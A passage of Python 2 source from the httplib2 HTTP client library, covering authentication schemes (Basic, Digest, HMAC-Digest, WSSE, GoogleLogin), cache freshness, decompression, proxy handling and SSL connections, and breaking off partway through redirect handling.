if match and len(match.groups()) == 3:
(key, value, the_rest) = match.groups()
auth_params[key.lower()] = UNQUOTE_PAIRS.sub(r'\1', value) # '\\'.join([x.replace('\\', '') for x in value.split('\\\\')])
match = www_auth.search(the_rest)
retval[auth_scheme.lower()] = auth_params
authenticate = the_rest.strip()
except ValueError:
raise MalformedHeader("WWW-Authenticate")
return retval
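# For example (a sketch):
# _parse_www_authenticate({'www-authenticate': 'Basic realm="test"'})
# -> {'basic': {'realm': 'test'}}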
def _entry_disposition(response_headers, request_headers):
"""Determine freshness from the Date, Expires and Cache-Control headers.
We don't handle the following:
1. Cache-Control: max-stale
2. Age: headers are not used in the calculations.
Note that this algorithm is simpler than you might think
because we are operating as a private (non-shared) cache.
This lets us ignore 's-maxage'. We can also ignore
'proxy-invalidate' since we aren't a proxy.
We will never return a stale document as
fresh as a design decision, and thus the non-implementation
of 'max-stale'. This also lets us safely ignore 'must-revalidate'
since we operate as if every server has sent 'must-revalidate'.
Since we are private we get to ignore both 'public' and
'private' parameters. We also ignore 'no-transform' since
we don't do any transformations.
The 'no-store' parameter is handled at a higher level.
So the only Cache-Control parameters we look at are:
no-cache
only-if-cached
max-age
min-fresh
"""
retval = "STALE"
cc = _parse_cache_control(request_headers)
cc_response = _parse_cache_control(response_headers)
if request_headers.has_key('pragma') and request_headers['pragma'].lower().find('no-cache') != -1:
retval = "TRANSPARENT"
if 'cache-control' not in request_headers:
request_headers['cache-control'] = 'no-cache'
elif cc.has_key('no-cache'):
retval = "TRANSPARENT"
elif cc_response.has_key('no-cache'):
retval = "STALE"
elif cc.has_key('only-if-cached'):
retval = "FRESH"
elif response_headers.has_key('date'):
date = calendar.timegm(email.Utils.parsedate_tz(response_headers['date']))
now = time.time()
current_age = max(0, now - date)
if cc_response.has_key('max-age'):
try:
freshness_lifetime = int(cc_response['max-age'])
except ValueError:
freshness_lifetime = 0
elif response_headers.has_key('expires'):
expires = email.Utils.parsedate_tz(response_headers['expires'])
if None == expires:
freshness_lifetime = 0
else:
freshness_lifetime = max(0, calendar.timegm(expires) - date)
else:
freshness_lifetime = 0
if cc.has_key('max-age'):
try:
freshness_lifetime = int(cc['max-age'])
except ValueError:
freshness_lifetime = 0
if cc.has_key('min-fresh'):
try:
min_fresh = int(cc['min-fresh'])
except ValueError:
min_fresh = 0
current_age += min_fresh
if freshness_lifetime > current_age:
retval = "FRESH"
return retval
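# For example (a sketch, where `now` is an RFC 2822 date string for the
# current time): a response of {'date': now, 'cache-control': 'max-age=3600'}
# checked against empty request headers yields "FRESH", while
# 'max-age=0' yields "STALE".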
def _decompressContent(response, new_content):
content = new_content
try:
encoding = response.get('content-encoding', None)
if encoding in ['gzip', 'deflate']:
if encoding == 'gzip':
content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
if encoding == 'deflate':
content = zlib.decompress(content)
response['content-length'] = str(len(content))
# Record the historical presence of the encoding in a way that won't interfere.
response['-content-encoding'] = response['content-encoding']
del response['content-encoding']
except IOError:
content = ""
raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
return content
def _updateCache(request_headers, response_headers, content, cache, cachekey):
if cachekey:
cc = _parse_cache_control(request_headers)
cc_response = _parse_cache_control(response_headers)
if cc.has_key('no-store') or cc_response.has_key('no-store'):
cache.delete(cachekey)
else:
info = email.Message.Message()
for key, value in response_headers.iteritems():
if key not in ['status','content-encoding','transfer-encoding']:
info[key] = value
# Add annotations to the cache to indicate what headers
# are variant for this request.
vary = response_headers.get('vary', None)
if vary:
vary_headers = vary.lower().replace(' ', '').split(',')
for header in vary_headers:
key = '-varied-%s' % header
try:
info[key] = request_headers[header]
except KeyError:
pass
status = response_headers.status
if status == 304:
status = 200
status_header = 'status: %d\r\n' % status
header_str = info.as_string()
header_str = re.sub("\r(?!\n)|(?<!\r)\n", "\r\n", header_str)
text = "".join([status_header, header_str, content])
cache.set(cachekey, text)
def _cnonce():
dig = _md5("%s:%s" % (time.ctime(), ["0123456789"[random.randrange(0, 9)] for i in range(20)])).hexdigest()
return dig[:16]
def _wsse_username_token(cnonce, iso_now, password):
return base64.b64encode(_sha("%s%s%s" % (cnonce, iso_now, password)).digest()).strip()
# For credentials we need two things, first
# a pool of credentials to try (not necessarily tied to Basic, Digest, etc.)
# Then we also need a list of URIs that have already demanded authentication
# That list is tricky since sub-URIs can take the same auth, or the
# auth scheme may change as you descend the tree.
# So we also need each Auth instance to be able to tell us
# how close to the 'top' it is.
class Authentication(object):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
self.path = path
self.host = host
self.credentials = credentials
self.http = http
def depth(self, request_uri):
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
return request_uri[len(self.path):].count("/")
def inscope(self, host, request_uri):
# XXX Should we normalize the request_uri?
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
return (host == self.host) and path.startswith(self.path)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header. Over-ride this in sub-classes."""
pass
def response(self, response, content):
"""Gives us a chance to update with new nonces
or such returned from the last authorized response.
Over-ride this in sub-classes if necessary.
Return TRUE if the request is to be retried, for
example Digest may return stale=true.
"""
return False
class BasicAuthentication(Authentication):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'Basic ' + base64.b64encode("%s:%s" % self.credentials).strip()
class DigestAuthentication(Authentication):
"""Only do qop='auth' and MD5, since that
is all Apache currently implements"""
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
self.challenge = challenge['digest']
qop = self.challenge.get('qop', 'auth')
self.challenge['qop'] = ('auth' in [x.strip() for x in qop.split()]) and 'auth' or None
if self.challenge['qop'] is None:
raise UnimplementedDigestAuthOptionError( _("Unsupported value for qop: %s." % qop))
self.challenge['algorithm'] = self.challenge.get('algorithm', 'MD5').upper()
if self.challenge['algorithm'] != 'MD5':
raise UnimplementedDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
self.A1 = "".join([self.credentials[0], ":", self.challenge['realm'], ":", self.credentials[1]])
self.challenge['nc'] = 1
def request(self, method, request_uri, headers, content, cnonce = None):
"""Modify the request headers"""
H = lambda x: _md5(x).hexdigest()
KD = lambda s, d: H("%s:%s" % (s, d))
A2 = "".join([method, ":", request_uri])
self.challenge['cnonce'] = cnonce or _cnonce()
request_digest = '"%s"' % KD(H(self.A1), "%s:%s:%s:%s:%s" % (
self.challenge['nonce'],
'%08x' % self.challenge['nc'],
self.challenge['cnonce'],
self.challenge['qop'], H(A2)))
headers['authorization'] = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", algorithm=%s, response=%s, qop=%s, nc=%08x, cnonce="%s"' % (
self.credentials[0],
self.challenge['realm'],
self.challenge['nonce'],
request_uri,
self.challenge['algorithm'],
request_digest,
self.challenge['qop'],
self.challenge['nc'],
self.challenge['cnonce'])
if self.challenge.get('opaque'):
headers['authorization'] += ', opaque="%s"' % self.challenge['opaque']
self.challenge['nc'] += 1
def response(self, response, content):
if not response.has_key('authentication-info'):
challenge = _parse_www_authenticate(response, 'www-authenticate').get('digest', {})
if 'true' == challenge.get('stale'):
self.challenge['nonce'] = challenge['nonce']
self.challenge['nc'] = 1
return True
else:
updated_challenge = _parse_www_authenticate(response, 'authentication-info').get('digest', {})
if updated_challenge.has_key('nextnonce'):
self.challenge['nonce'] = updated_challenge['nextnonce']
self.challenge['nc'] = 1
return False
class HmacDigestAuthentication(Authentication):
"""Adapted from Robert Sayre's code and DigestAuthentication above."""
__author__ = "Thomas Broyer ([email protected])"
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
self.challenge = challenge['hmacdigest']
# TODO: self.challenge['domain']
self.challenge['reason'] = self.challenge.get('reason', 'unauthorized')
if self.challenge['reason'] not in ['unauthorized', 'integrity']:
self.challenge['reason'] = 'unauthorized'
self.challenge['salt'] = self.challenge.get('salt', '')
if not self.challenge.get('snonce'):
raise UnimplementedHmacDigestAuthOptionError( _("The challenge doesn't contain a server nonce, or this one is empty."))
self.challenge['algorithm'] = self.challenge.get('algorithm', 'HMAC-SHA-1')
if self.challenge['algorithm'] not in ['HMAC-SHA-1', 'HMAC-MD5']:
raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
self.challenge['pw-algorithm'] = self.challenge.get('pw-algorithm', 'SHA-1')
if self.challenge['pw-algorithm'] not in ['SHA-1', 'MD5']:
raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for pw-algorithm: %s." % self.challenge['pw-algorithm']))
if self.challenge['algorithm'] == 'HMAC-MD5':
self.hashmod = _md5
else:
self.hashmod = _sha
if self.challenge['pw-algorithm'] == 'MD5':
self.pwhashmod = _md5
else:
self.pwhashmod = _sha
self.key = "".join([self.credentials[0], ":",
self.pwhashmod.new("".join([self.credentials[1], self.challenge['salt']])).hexdigest().lower(),
":", self.challenge['realm']])
self.key = self.pwhashmod.new(self.key).hexdigest().lower()
def request(self, method, request_uri, headers, content):
"""Modify the request headers"""
keys = _get_end2end_headers(headers)
keylist = "".join(["%s " % k for k in keys])
headers_val = "".join([headers[k] for k in keys])
created = time.strftime('%Y-%m-%dT%H:%M:%SZ',time.gmtime())
cnonce = _cnonce()
request_digest = "%s:%s:%s:%s:%s" % (method, request_uri, cnonce, self.challenge['snonce'], headers_val)
request_digest = hmac.new(self.key, request_digest, self.hashmod).hexdigest().lower()
headers['authorization'] = 'HMACDigest username="%s", realm="%s", snonce="%s", cnonce="%s", uri="%s", created="%s", response="%s", headers="%s"' % (
self.credentials[0],
self.challenge['realm'],
self.challenge['snonce'],
cnonce,
request_uri,
created,
request_digest,
keylist)
def response(self, response, content):
challenge = _parse_www_authenticate(response, 'www-authenticate').get('hmacdigest', {})
if challenge.get('reason') in ['integrity', 'stale']:
return True
return False
class WsseAuthentication(Authentication):
"""This is thinly tested and should not be relied upon.
At this time there isn't any third party server to test against.
Blogger and TypePad implemented this algorithm at one point
but Blogger has since switched to Basic over HTTPS and
TypePad has implemented it wrong, by never issuing a 401
challenge but instead requiring your client to telepathically know that
their endpoint is expecting WSSE profile="UsernameToken"."""
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'WSSE profile="UsernameToken"'
iso_now = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
cnonce = _cnonce()
password_digest = _wsse_username_token(cnonce, iso_now, self.credentials[1])
headers['X-WSSE'] = 'UsernameToken Username="%s", PasswordDigest="%s", Nonce="%s", Created="%s"' % (
self.credentials[0],
password_digest,
cnonce,
iso_now)
class GoogleLoginAuthentication(Authentication):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
from urllib import urlencode
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
service = challenge['googlelogin'].get('service', 'xapi')
# Blogger actually returns the service in the challenge
# For the rest we guess based on the URI
if service == 'xapi' and request_uri.find("calendar") > 0:
service = "cl"
# No point in guessing Base or Spreadsheet
#elif request_uri.find("spreadsheets") > 0:
# service = "wise"
auth = dict(Email=credentials[0], Passwd=credentials[1], service=service, source=headers['user-agent'])
resp, content = self.http.request("https://www.google.com/accounts/ClientLogin", method="POST", body=urlencode(auth), headers={'Content-Type': 'application/x-www-form-urlencoded'})
lines = content.split('\n')
d = dict([tuple(line.split("=", 1)) for line in lines if line])
if resp.status == 403:
self.Auth = ""
else:
self.Auth = d['Auth']
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'GoogleLogin Auth=' + self.Auth
AUTH_SCHEME_CLASSES = {
"basic": BasicAuthentication,
"wsse": WsseAuthentication,
"digest": DigestAuthentication,
"hmacdigest": HmacDigestAuthentication,
"googlelogin": GoogleLoginAuthentication
}
AUTH_SCHEME_ORDER = ["hmacdigest", "googlelogin", "digest", "wsse", "basic"]
class FileCache(object):
"""Uses a local directory as a store for cached files.
Not really safe to use if multiple threads or processes are going to
be running on the same cache.
"""
def __init__(self, cache, safe=safename): # use safe=lambda x: md5.new(x).hexdigest() for the old behavior
self.cache = cache
self.safe = safe
if not os.path.exists(cache):
os.makedirs(self.cache)
def get(self, key):
retval = None
cacheFullPath = os.path.join(self.cache, self.safe(key))
try:
f = file(cacheFullPath, "rb")
retval = f.read()
f.close()
except IOError:
pass
return retval
def set(self, key, value):
cacheFullPath = os.path.join(self.cache, self.safe(key))
f = file(cacheFullPath, "wb")
f.write(value)
f.close()
def delete(self, key):
cacheFullPath = os.path.join(self.cache, self.safe(key))
if os.path.exists(cacheFullPath):
os.remove(cacheFullPath)
class Credentials(object):
def __init__(self):
self.credentials = []
def add(self, name, password, domain=""):
self.credentials.append((domain.lower(), name, password))
def clear(self):
self.credentials = []
def iter(self, domain):
for (cdomain, name, password) in self.credentials:
if cdomain == "" or domain == cdomain:
yield (name, password)
class KeyCerts(Credentials):
"""Identical to Credentials except that
name/password are mapped to key/cert."""
pass
class AllHosts(object):
pass
class ProxyInfo(object):
"""Collect information required to use a proxy."""
bypass_hosts = ()
def __init__(self, proxy_type, proxy_host, proxy_port,
proxy_rdns=None, proxy_user=None, proxy_pass=None):
"""The parameter proxy_type must be set to one of socks.PROXY_TYPE_XXX
constants. For example:
p = ProxyInfo(proxy_type=socks.PROXY_TYPE_HTTP,
proxy_host='localhost', proxy_port=8000)
"""
self.proxy_type = proxy_type
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_rdns = proxy_rdns
self.proxy_user = proxy_user
self.proxy_pass = proxy_pass
def astuple(self):
return (self.proxy_type, self.proxy_host, self.proxy_port,
self.proxy_rdns, self.proxy_user, self.proxy_pass)
def isgood(self):
return (self.proxy_host != None) and (self.proxy_port != None)
def applies_to(self, hostname):
return not self.bypass_host(hostname)
def bypass_host(self, hostname):
"""Has this host been excluded from the proxy config"""
if self.bypass_hosts is AllHosts:
return True
bypass = False
for domain in self.bypass_hosts:
if hostname.endswith(domain):
bypass = True
return bypass
def proxy_info_from_environment(method='http'):
"""
Read proxy info from the environment variables.
"""
if method not in ['http', 'https']:
return
env_var = method + '_proxy'
url = os.environ.get(env_var, os.environ.get(env_var.upper()))
if not url:
return
pi = proxy_info_from_url(url, method)
no_proxy = os.environ.get('no_proxy', os.environ.get('NO_PROXY', ''))
bypass_hosts = []
if no_proxy:
bypass_hosts = no_proxy.split(',')
# special case, no_proxy=* means all hosts bypassed
if no_proxy == '*':
bypass_hosts = AllHosts
pi.bypass_hosts = bypass_hosts
return pi
def proxy_info_from_url(url, method='http'):
"""
Construct a ProxyInfo from a URL (such as http_proxy env var)
"""
url = urlparse.urlparse(url)
username = None
password = None
port = None
if '@' in url[1]:
ident, host_port = url[1].split('@', 1)
if ':' in ident:
username, password = ident.split(':', 1)
else:
password = ident
else:
host_port = url[1]
if ':' in host_port:
host, port = host_port.split(':', 1)
else:
host = host_port
if port:
port = int(port)
else:
port = dict(https=443, http=80)[method]
proxy_type = 3 # socks.PROXY_TYPE_HTTP
return ProxyInfo(
proxy_type = proxy_type,
proxy_host = host,
proxy_port = port,
proxy_user = username or None,
proxy_pass = password or None,
)
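# For example (a sketch):
# proxy_info_from_url('http://joe:secret@proxy.example.com:8080')
# -> ProxyInfo(proxy_type=3, proxy_host='proxy.example.com', proxy_port=8080,
# proxy_user='joe', proxy_pass='secret')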
class HTTPConnectionWithTimeout(httplib.HTTPConnection):
"""
HTTPConnection subclass that supports timeouts
All timeouts are in seconds. If None is passed for timeout then
Python's default timeout for sockets will be used. See for example
the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
"""
def __init__(self, host, port=None, strict=None, timeout=None, proxy_info=None):
httplib.HTTPConnection.__init__(self, host, port, strict)
self.timeout = timeout
self.proxy_info = proxy_info
def connect(self):
"""Connect to the host and port specified in __init__."""
# Mostly verbatim from httplib.py.
if self.proxy_info and socks is None:
raise ProxiesUnavailableError(
'Proxy support missing but proxy use was requested!')
msg = "getaddrinfo returns an empty list"
if self.proxy_info and self.proxy_info.isgood():
use_proxy = True
proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
else:
use_proxy = False
if use_proxy and proxy_rdns:
host = proxy_host
port = proxy_port
else:
host = self.host
port = self.port
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
if use_proxy:
self.sock = socks.socksocket(af, socktype, proto)
self.sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
else:
self.sock = socket.socket(af, socktype, proto)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Different from httplib: support timeouts.
if has_timeout(self.timeout):
self.sock.settimeout(self.timeout)
# End of difference from httplib.
if self.debuglevel > 0:
print "connect: (%s, %s) ************" % (self.host, self.port)
if use_proxy:
print "proxy: %s ************" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
self.sock.connect((self.host, self.port) + sa[2:])
except socket.error, msg:
if self.debuglevel > 0:
print "connect fail: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error, msg
class HTTPSConnectionWithTimeout(httplib.HTTPSConnection):
"""
This class allows communication via SSL.
All timeouts are in seconds. If None is passed for timeout then
Python's default timeout for sockets will be used. See for example
the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
"""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None,
ca_certs=None, disable_ssl_certificate_validation=False):
httplib.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, strict=strict)
self.timeout = timeout
self.proxy_info = proxy_info
if ca_certs is None:
ca_certs = CA_CERTS
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = \
disable_ssl_certificate_validation
# The following two methods were adapted from https_wrapper.py, released
# with the Google Appengine SDK at
# http://googleappengine.googlecode.com/svn-history/r136/trunk/python/google/appengine/tools/https_wrapper.py
# under the following license:
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def _GetValidHostsForCert(self, cert):
"""Returns a list of valid host globs for an SSL certificate.
Args:
cert: A dictionary representing an SSL certificate.
Returns:
list: A list of valid host globs.
"""
if 'subjectAltName' in cert:
return [x[1] for x in cert['subjectAltName']
if x[0].lower() == 'dns']
else:
return [x[0][1] for x in cert['subject']
if x[0][0].lower() == 'commonname']
def _ValidateCertificateHostname(self, cert, hostname):
"""Validates that a given hostname is valid for an SSL certificate.
Args:
cert: A dictionary representing an SSL certificate.
hostname: The hostname to test.
Returns:
bool: Whether or not the hostname is valid for this certificate.
"""
hosts = self._GetValidHostsForCert(cert)
for host in hosts:
host_re = host.replace('.', '\.').replace('*', '[^.]*')
if re.search('^%s$' % (host_re,), hostname, re.I):
return True
return False
def connect(self):
"Connect to a host on a given (SSL) port."
msg = "getaddrinfo returns an empty list"
if self.proxy_info and self.proxy_info.isgood():
use_proxy = True
proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
else:
use_proxy = False
if use_proxy and proxy_rdns:
host = proxy_host
port = proxy_port
else:
host = self.host
port = self.port
address_info = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
for family, socktype, proto, canonname, sockaddr in address_info:
try:
if use_proxy:
sock = socks.socksocket(family, socktype, proto)
sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
else:
sock = socket.socket(family, socktype, proto)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if has_timeout(self.timeout):
sock.settimeout(self.timeout)
sock.connect((self.host, self.port))
self.sock =_ssl_wrap_socket(
sock, self.key_file, self.cert_file,
self.disable_ssl_certificate_validation, self.ca_certs)
if self.debuglevel > 0:
print "connect: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if not self.disable_ssl_certificate_validation:
cert = self.sock.getpeercert()
hostname = self.host.split(':')[0]
if not self._ValidateCertificateHostname(cert, hostname):
raise CertificateHostnameMismatch(
'Server presented certificate that does not match '
'host %s: %s' % (hostname, cert), hostname, cert)
except ssl_SSLError, e:
if sock:
sock.close()
if self.sock:
self.sock.close()
self.sock = None
# Unfortunately the ssl module doesn't seem to provide any way
# to get at more detailed error information, in particular
# whether the error is due to certificate validation or
# something else (such as SSL protocol mismatch).
if e.errno == ssl.SSL_ERROR_SSL:
raise SSLHandshakeError(e)
else:
raise
except (socket.timeout, socket.gaierror):
raise
except socket.error, msg:
if self.debuglevel > 0:
print "connect fail: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error, msg
SCHEME_TO_CONNECTION = {
'http': HTTPConnectionWithTimeout,
'https': HTTPSConnectionWithTimeout
}
# Use a different connection object for Google App Engine
try:
try:
from google.appengine.api import apiproxy_stub_map
if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
raise ImportError # Bail out; we're not actually running on App Engine.
from google.appengine.api.urlfetch import fetch
from google.appengine.api.urlfetch import InvalidURLError
except (ImportError, AttributeError):
from google3.apphosting.api import apiproxy_stub_map
if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
raise ImportError # Bail out; we're not actually running on App Engine.
from google3.apphosting.api.urlfetch import fetch
from google3.apphosting.api.urlfetch import InvalidURLError
def _new_fixed_fetch(validate_certificate):
def fixed_fetch(url, payload=None, method="GET", headers={},
allow_truncated=False, follow_redirects=True,
deadline=5):
return fetch(url, payload=payload, method=method, headers=headers,
allow_truncated=allow_truncated,
follow_redirects=follow_redirects, deadline=deadline,
validate_certificate=validate_certificate)
return fixed_fetch
class AppEngineHttpConnection(httplib.HTTPConnection):
"""Use httplib on App Engine, but compensate for its weirdness.
The parameters key_file, cert_file, proxy_info, ca_certs, and
disable_ssl_certificate_validation are all dropped on the ground.
"""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None, ca_certs=None,
disable_ssl_certificate_validation=False):
httplib.HTTPConnection.__init__(self, host, port=port,
strict=strict, timeout=timeout)
class AppEngineHttpsConnection(httplib.HTTPSConnection):
"""Same as AppEngineHttpConnection, but for HTTPS URIs."""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None, ca_certs=None,
disable_ssl_certificate_validation=False):
httplib.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, strict=strict,
timeout=timeout)
self._fetch = _new_fixed_fetch(
not disable_ssl_certificate_validation)
# Update the connection classes to use the Google App Engine specific ones.
SCHEME_TO_CONNECTION = {
'http': AppEngineHttpConnection,
'https': AppEngineHttpsConnection
}
except (ImportError, AttributeError):
pass
class Http(object):
"""An HTTP client that handles:
- all methods
- caching
- ETags
- compression
- HTTPS
- Basic
- Digest
- WSSE
and more.
"""
def __init__(self, cache=None, timeout=None,
proxy_info=proxy_info_from_environment,
ca_certs=None, disable_ssl_certificate_validation=False):
"""If 'cache' is a string then it is used as a directory name for
a disk cache. Otherwise it must be an object that supports the
same interface as FileCache.
All timeouts are in seconds. If None is passed for timeout
then Python's default timeout for sockets will be used. See
for example the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
`proxy_info` may be:
- a callable that takes the http scheme ('http' or 'https') and
returns a ProxyInfo instance per request. By default, uses
proxy_info_from_environment.
- a ProxyInfo instance (static proxy config).
- None (proxy disabled).
ca_certs is the path of a file containing root CA certificates for SSL
server certificate validation. By default, a CA cert file bundled with
httplib2 is used.
If disable_ssl_certificate_validation is true, SSL cert validation will
not be performed.
"""
self.proxy_info = proxy_info
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = \
disable_ssl_certificate_validation
# Map domain name to an httplib connection
self.connections = {}
# The location of the cache, for now a directory
# where cached responses are held.
if cache and isinstance(cache, basestring):
self.cache = FileCache(cache)
else:
self.cache = cache
# Name/password
self.credentials = Credentials()
# Key/cert
self.certificates = KeyCerts()
# authorization objects
self.authorizations = []
# If set to False then no redirects are followed, even safe ones.
self.follow_redirects = True
# Which HTTP methods do we apply optimistic concurrency to, i.e.
# which methods get an "if-match:" etag header added to them.
self.optimistic_concurrency_methods = ["PUT", "PATCH"]
# If 'follow_redirects' is True, and this is set to True then
# all redirects are followed, including unsafe ones.
self.follow_all_redirects = False
self.ignore_etag = False
self.force_exception_to_status_code = False
self.timeout = timeout
# Keep Authorization: headers on a redirect.
self.forward_authorization_headers = False
def __getstate__(self):
state_dict = copy.copy(self.__dict__)
# In case request is augmented by some foreign object such as
# credentials which handle auth
if 'request' in state_dict:
del state_dict['request']
if 'connections' in state_dict:
del state_dict['connections']
return state_dict
def __setstate__(self, state):
self.__dict__.update(state)
self.connections = {}
def _auth_from_challenge(self, host, request_uri, headers, response, content):
"""A generator that creates Authorization objects
that can be applied to requests.
"""
challenges = _parse_www_authenticate(response, 'www-authenticate')
for cred in self.credentials.iter(host):
for scheme in AUTH_SCHEME_ORDER:
if challenges.has_key(scheme):
yield AUTH_SCHEME_CLASSES[scheme](cred, host, request_uri, headers, response, content, self)
def add_credentials(self, name, password, domain=""):
"""Add a name and password that will be used
any time a request requires authentication."""
self.credentials.add(name, password, domain)
def add_certificate(self, key, cert, domain):
"""Add a key and cert that will be used
any time a request requires authentication."""
self.certificates.add(key, cert, domain)
def clear_credentials(self):
"""Remove all the names and passwords
that are used for authentication"""
self.credentials.clear()
self.authorizations = []
def _conn_request(self, conn, request_uri, method, body, headers):
for i in range(RETRIES):
try:
if hasattr(conn, 'sock') and conn.sock is None:
conn.connect()
conn.request(method, request_uri, body, headers)
except socket.timeout:
raise
except socket.gaierror:
conn.close()
raise ServerNotFoundError("Unable to find the server at %s" % conn.host)
except ssl_SSLError:
conn.close()
raise
except socket.error, e:
err = 0
if hasattr(e, 'args'):
err = getattr(e, 'args')[0]
else:
err = e.errno
if err == errno.ECONNREFUSED: # Connection refused
raise
except httplib.HTTPException:
# Just because the server closed the connection doesn't apparently mean
# that the server didn't send a response.
if hasattr(conn, 'sock') and conn.sock is None:
if i < RETRIES-1:
conn.close()
conn.connect()
continue
else:
conn.close()
raise
if i < RETRIES-1:
conn.close()
conn.connect()
continue
try:
response = conn.getresponse()
except (socket.error, httplib.HTTPException):
if i < RETRIES-1:
conn.close()
conn.connect()
continue
else:
conn.close()
raise
else:
content = ""
if method == "HEAD":
conn.close()
else:
content = response.read()
response = Response(response)
if method != "HEAD":
content = _decompressContent(response, content)
break
return (response, content)
def _request(self, conn, host, absolute_uri, request_uri, method, body, headers, redirections, cachekey):
"""Do the actual request using the connection object
and also follow one level of redirects if necessary"""
auths = [(auth.depth(request_uri), auth) for auth in self.authorizations if auth.inscope(host, request_uri)]
auth = auths and sorted(auths)[0][1] or None
if auth:
auth.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers)
if auth:
if auth.response(response, body):
auth.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers )
response._stale_digest = 1
if response.status == 401:
for authorization in self._auth_from_challenge(host, request_uri, headers, response, content):
authorization.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers, )
if response.status != 401:
self.authorizations.append(authorization)
authorization.response(response, body)
break
if (self.follow_all_redirects or (method in ["GET", "HEAD"]) or response.status == 303):
if self.follow_redirects and response.status in [300, 301, 302, 303, 307]:
# Pick out the location header and basically start from the beginning
# remembering first to strip the ETag header and decrement our 'depth'
if redirections:
if not response.has_key('location') and response.status != 300:
raise RedirectMissingLocation( _("Redirected but the response is missing a Location: header."), response, content)
# Fix-up relative redirects (which violate an RFC 2616 MUST)
if response.has_key('location'):
location = response['location']
(scheme, authority, path, query, fragment) = parse_uri(location)
if authority == None:
response['location'] = urlparse.urljoin(absolute_uri, location)
if response.status == 301 and method in ["GET", "HEAD"]:
response['-x-permanent-redirect-url'] = response['location']
if not response.has_key('content-location'):
response['content-location'] = absolute_uri
_updateCache(headers, response, content, self.cache, cachekey)
if headers.has_key('if-none-match'):
del headers['if-none-match']
if headers.has_key('if-modified-since'):
del headers['if-modified-since']
if 'authorization' in headers and not self.forward_authorization_headers:
del headers['authorization']
if response.has_key('location'):
location = response['location']
old_response = copy.deepcopy(response)
if not old_response.has_key('content-location'):
old_response['content-location'] = absolute_uri
